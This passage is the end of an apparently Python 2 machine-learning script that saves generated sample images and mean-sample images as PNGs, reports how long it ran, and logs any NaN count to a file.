            image = paramgraphics.mat_to_img(_x.T, dim_input, colorImg=colorImg)
            image.save(logdir+'samples'+tail, 'PNG')
            image = paramgraphics.mat_to_img(_x_mean.T, dim_input, colorImg=colorImg)
            image.save(logdir+'mean_samples'+tail, 'PNG')
        #print 'generation_time', time.clock() - tmp_start4

    end_time = time.clock()
    print >> sys.stderr, ('The code for file ' +
                          os.path.split(__file__)[1] +
                          ' ran for %.2fm' % ((end_time - start_time) / 60.))
    if NaN_count > 0:
        print '---------------NaN_count:', NaN_count
        with open(logdir+'hook.txt', 'a') as f:
            print >>f, '---------------NaN_count:', NaN_count